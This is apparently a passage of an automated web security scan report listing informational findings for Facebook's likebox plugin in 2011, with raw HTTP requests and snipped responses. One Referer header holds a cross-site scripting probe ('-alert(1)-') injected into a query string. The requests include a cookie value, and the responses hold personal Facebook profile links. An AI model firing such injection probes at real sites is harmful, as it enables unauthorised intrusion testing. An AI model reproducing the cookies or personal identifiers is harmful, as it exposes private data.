<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/sportingnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg" alt="Sporting News" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000284158351" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/KickIceForever" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000862415977" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001563480027" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187084_100001563480027_4806394_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/skdarealist" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/theteebers" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1605429091" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/deedee.perez1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000255574831" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001677506211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/HockeyKen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lakendra.roberts" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000541068085" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1620706090" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1003057323" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000505084012" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000227723086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kimberly.christ" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211391_713468228_4670594_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002180027523" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.54. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.153.37
X-Cnection: close
Date: Thu, 05 May 2011 01:23:40 GMT
Content-Length: 12836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/techcrunch" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg" alt="TechCrunch" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ladonna.lokey" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/burkerkink" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161097_930382_8228585_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1516233108" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=583081899" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173823_583081899_855451_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202910_30100351_6302006_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/stefanoboscolomarchi" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203013_1594520820_732429_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173714_100002099733844_620947_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/fayse" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203168_583541383_5974255_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000618593365" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.55. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.86.39
X-Cnection: close
Date: Thu, 05 May 2011 01:39:58 GMT
Content-Length: 12847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/techcrunch" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg" alt="TechCrunch" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27346_218301189_4069_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000618593365" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002085327936" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186257_100002085327936_6884987_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173714_100002099733844_620947_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/patroyo" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173829_1121954486_3643890_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/stefanoboscolomarchi" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203013_1594520820_732429_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ladonna.lokey" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/fayse" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203168_583541383_5974255_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1516233108" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.56. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Faol&width=292&colorscheme=light&connections=10&stream=false&header=true&height=300
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Faol&width=292&colorscheme=light&connections=10&stream=false&header=true&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?ba9f0%22-alert(1)-%22394da22382f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.185.37
X-Cnection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 13448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/aol" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174868_107651419258212_7433843_q.jpg" alt="AOL" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000492847628" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41437_100000492847628_3805_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001214862014" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41724_100001214862014_9793_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000197303046" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1000749683" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202900_1000749683_799781_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1209024507" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174406_1209024507_6026034_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001408469053" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187114_100001408469053_6849283_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001480571054" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187169_100001480571054_4571090_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002265200974" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187675_100002265200974_930338_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000732676954" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195469_100000732676954_45178_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/mary.wardoconnell" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211227_100001138994662_8069412_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.57. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df358c084ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df358c084ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.60.91
X-Cnection: close
Date: Thu, 05 May 2011 01:18:14 GMT
Content-Length: 16151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/sportingnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg" alt="Sporting News" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1003057323" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1605429091" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002180027523" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000227723086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001677506211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000255574831" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000541068085" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000505084012" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001563480027" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195650_100001563480027_4575550_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lakendra.roberts" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/deedee.perez1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/HockeyKen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1620706090" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/skdarealist" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000284158351" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/theteebers" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000862415977" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kimberly.christ" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211391_713468228_4670594_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/KickIceForever" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.58. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=16327590002&width=292&connections=0&stream=false&header=false&height=165
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/27524_16327590002_3202_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=16327590002&width=292&connections=0&stream=false&header=false&height=165 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
